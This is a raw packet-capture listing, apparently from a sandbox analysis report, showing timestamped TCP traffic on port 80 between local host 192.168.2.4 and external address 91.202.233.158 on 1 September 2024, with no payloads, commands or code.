Sep 1, 2024 18:28:22.193567991 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193578005 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193578005 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.193588018 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.193608999 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194010973 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194020033 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194029093 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194040060 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194048882 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194048882 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194057941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194067001 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194076061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194077015 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194087029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194096088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194099903 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194106102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194108009 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194117069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194125891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194128036 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194137096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194147110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194149971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194158077 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194175005 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194185972 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194207907 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194705963 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194715023 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194725037 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194735050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194744110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194751978 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194751978 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194767952 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194777012 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194778919 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194788933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194793940 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194797993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194807053 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194817066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194819927 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194827080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.194845915 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.194863081 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195029974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195039034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195048094 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195058107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195066929 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195066929 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195080042 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195089102 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195111990 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195132971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195158958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195168972 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195178032 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195194960 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195199966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195203066 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195213079 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195216894 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195221901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195233107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195235968 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195241928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195245981 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195251942 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195261955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195271015 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195276976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195286989 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195293903 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195296049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195300102 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195306063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195314884 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195324898 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.195327997 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195350885 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.195362091 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.196010113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196018934 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196027040 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196037054 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196046114 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.196060896 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196069002 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.196070910 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196079016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196089029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196096897 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.196096897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196105957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196115971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196121931 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.196125984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196135998 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196141958 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.196145058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196154118 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196156025 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.196163893 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196173906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196178913 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.196183920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196193933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196197987 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.196202993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196213007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196213961 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.196223021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.196229935 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.196252108 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.279227018 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279242039 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279253006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279311895 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.279328108 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279337883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279345989 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.279349089 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279361010 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279372931 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.279372931 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279405117 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.279444933 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279489994 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.279546976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279556990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279566050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279577017 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279581070 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.279587030 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279601097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.279623985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.279778004 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279788971 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279798031 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279809952 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279820919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279820919 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.279829979 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.279836893 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.279871941 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280021906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280031919 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280040979 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280050993 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280061960 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280064106 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280071974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280082941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280083895 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280092955 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280105114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280118942 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280143976 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280277014 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280287027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280316114 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280359983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280369997 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280378103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280389071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280395031 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280404091 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280414104 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280421019 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280425072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280450106 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280464888 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280607939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280648947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280651093 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280659914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280684948 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280698061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280831099 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280841112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280848980 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280858994 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280868053 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280869007 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280879021 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280884027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280889988 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.280909061 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.280917883 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281076908 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281086922 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281095982 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281106949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281112909 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281130075 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281135082 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281141043 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281150103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281157017 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281160116 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281169891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281178951 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281179905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281191111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281198978 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281210899 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281228065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281483889 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281492949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281521082 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281532049 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281536102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281547070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281555891 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281567097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281574965 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281574965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281600952 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281610012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281866074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281876087 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281884909 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281896114 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281904936 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281908035 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281914949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.281932116 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.281948090 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282111883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282121897 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282130003 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282140017 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282150030 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282150984 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282159090 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282160044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282171011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282180071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282186985 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282190084 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282200098 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282207966 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282210112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282221079 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282222986 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282239914 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282248020 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282257080 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282263041 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282265902 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282274961 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282285929 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282288074 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282298088 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282303095 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282308102 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282319069 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282329082 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282329082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282339096 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282349110 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.282351971 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282360077 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.282387018 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.283276081 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283287048 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283294916 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283303976 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283310890 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.283313990 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283324957 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283333063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283337116 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.283344984 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283354044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283360958 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.283364058 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283374071 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.283374071 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283385038 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283395052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283397913 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.283402920 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283413887 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283418894 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.283423901 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283433914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.283437967 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.283454895 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.283468008 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.365804911 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.365844011 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.365847111 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.365854025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.365875959 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.365885019 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.365957022 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.365966082 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.365974903 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.365988016 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.365992069 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.365998983 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366014957 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366035938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366112947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366123915 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366133928 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366148949 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366173983 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366246939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366250992 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366255045 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366262913 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366290092 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366312027 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366373062 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366389036 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366403103 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366409063 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366414070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366421938 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366422892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366434097 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366439104 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366444111 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366445065 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:22.366460085 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:22.366466999 CEST	56177	80	192.168.2.4	91.202.233.158
